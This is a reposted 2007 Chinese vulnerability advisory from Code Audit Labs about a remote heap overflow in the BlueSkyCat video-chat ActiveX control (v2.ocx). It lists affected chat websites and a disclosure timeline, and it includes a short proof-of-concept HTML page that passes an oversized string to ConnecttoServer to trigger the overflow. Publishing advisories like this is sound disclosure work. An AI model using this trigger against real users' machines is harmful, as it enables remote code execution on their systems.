文章
|
入侵攻击
|
安全防御
|
操作系统
|
网站建设
|
网络编程
|
路由交换
|
灾难恢复
|
新闻资讯
|
安全公告
下载
|
漏洞扫描
|
加密破解
|
入侵攻击
|
后门木马
|
溢出程序
|
综合工具
|
安全防护
|
原创发布
|
动画教程
论坛
|
黑客军火
|
配服务器
|
黑客情感
|
免费资源
|
美女贴图
|
灌水无罪
|
在线服务
|
会员照片
|
网站首页
当前位置:
主页
>>
安全公告
>>
漏洞公告
>> 文章内容
视频语音聊天系统的漏洞
www.hx99.org 阅读: 时间:2007-08-08 整理:华西黑盟
------------------------------------------------------------------
type="text/javascript"> src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
来源:野路子(wulujia.com)
CAL-20070730-1 BlueSkyCat ActiveX远程
代码
执行
漏洞
我们是
代码
审计实验室(Code Audit Labs
http://www.vulnhunt.com/
).
为保护客户安全,我们对"蓝天专业可视语音聊天系统"blueskycat v2.ocx(version 8.1.2.0) 文件做了下内部审计。blueskycat是应用广泛的语音和视频聊天室软件,由blueSky.cn开发.
发现几处v2.ocx ActiveX的安全
漏洞
,远程攻击者可能利用此
漏洞
控制用户机器。
该文原始连接
1:
http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability.txt
2:
http://CodeAudit.blogspot.com
CVE:
====
We request a CVE number to assign to this vulnerability.
细节:
=====
BlueSkyCat所安装的v2.ocx控件中的ConnecttoServer函数没有正确验证用户输入
参数,如果用户受骗访问了恶意页面的话,就可能触发堆溢出,导致执行任意指令。
从而控制安装有受影响版本的BlueSkyCat软件的用户机器。
以下您的客户的客户的机器都会受到影响
碧聊
http://www.bliao.com
QQ聊
http://www.qqliao.com
七聊
http://www.7liao.com
好聊
http://www.haoliao.net
我要聊
http://chat.51liao.net
圣域佛教
http://www.heshang.net
喜满你
http://vchat.xicn.net
CN104
http://www.cn104.com
学聊
http://www.liao-tian.com
情聊
http://www.aliao.net
快聊
http://www.kuailiao.com
模特聊
http://www.mtliao.com
北国娱乐网
http://www.pj0427.com
维语聊
http://chat.uighur.cn
舞魅聊
http://www.wmliao.com
受影响版本:
===========
v2.ocx version 8.1.2.0(当前最新版本) 和以前版本
厂家:
=====
BlueSky
测试
代码
:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">
function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="__javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>
代码
审计实验室建议:
==================
Code Audit Labs建议厂家自己进行一次全面的
代码
安全检查(Code Audit or Code
Review),同时我们Code Audit Labs也提供
代码
审计(Code Audit)服务,假如您需要
我们的服务,请联系
mailto:Vulnhunt@gmail.com?subject=request code review service.
同时,为保护您所创建的价值,我们会等到您修复该
漏洞
后公告该
漏洞
。
假如您申请我们的Code Audit服务,那么,我们有义务为您保持该信息。
时间表:
======
1: 2007-07-29 通知厂家 (mail to blueskychat@gmail.com)
2: 2007-07-29 厂家回复说已经升级。
3: 2007-07-30 经过我们的确认,bluesky的客户都还没有升级他们的程序。
都还处在危险之中,发信通知vendor)
4: 2007-07-31 发布该
漏洞
关于我们:
=========
代码
审计实验室(Code Audit Labs)致力于自动化
代码
审计(包括源
代码
和二进制
代码
)
研究和开发,为提高软件安全测试的效率以及软件
代码
质量不懈努力.
Code Audit Labs信念: "您为客户创造价值,我们保护您创造的价值。"
http://www.VulnHunt.com
EOF
【免费加入会员】
【我要投稿】
【关闭本页】
-------------------------------------------------------------------------------------------
上一篇:
百度超级搜霸远程代码执行漏洞
下一篇:
NSFOCUS 2007年07月之十大安全漏洞
-------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
文章
软件
精品推荐
Discuz! 6.0.0 0Day漏洞
视频语音聊天系统的漏洞
DVBBS 7.1.0 SP1博客远程
bbsxp上传注入漏洞
现代教务管理系统漏洞
MS05-055:Windows内核中
QQ幻想盗号器病毒 窃取游
沸腾新闻系统 V1.1 Access
动网8.0最新漏洞
NSFOCUS 2007年07月之十大
DNS漏洞攻击增多 微软忙着
mssql2005存手工注入漏洞
oblog商业版本4.6注射漏洞
PHPWind论坛5.3版postuplo
百度超级搜霸远程代码执行
DVBBS V7.1 SP1 Boke注入
DedeCMS最新版存在暴物理
QQ惊爆危险漏洞 360截获“
动易最新未公开漏洞
bo-blog2.0.3文件浏览漏洞
宁波都市网漏洞公告(通杀
Microsoft Internet Explo
乔客(joekoe) CMS 4.0 的2
雅虎窗件曝出缓冲区溢出漏
phpRPC库远程代码执行漏洞
关于我们
|
发展历程
|
在线投稿
|
核心监督
|
友情链接
|
网站地图
|
网站留言
|
联系我们
Copyright © 2004-2007
Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号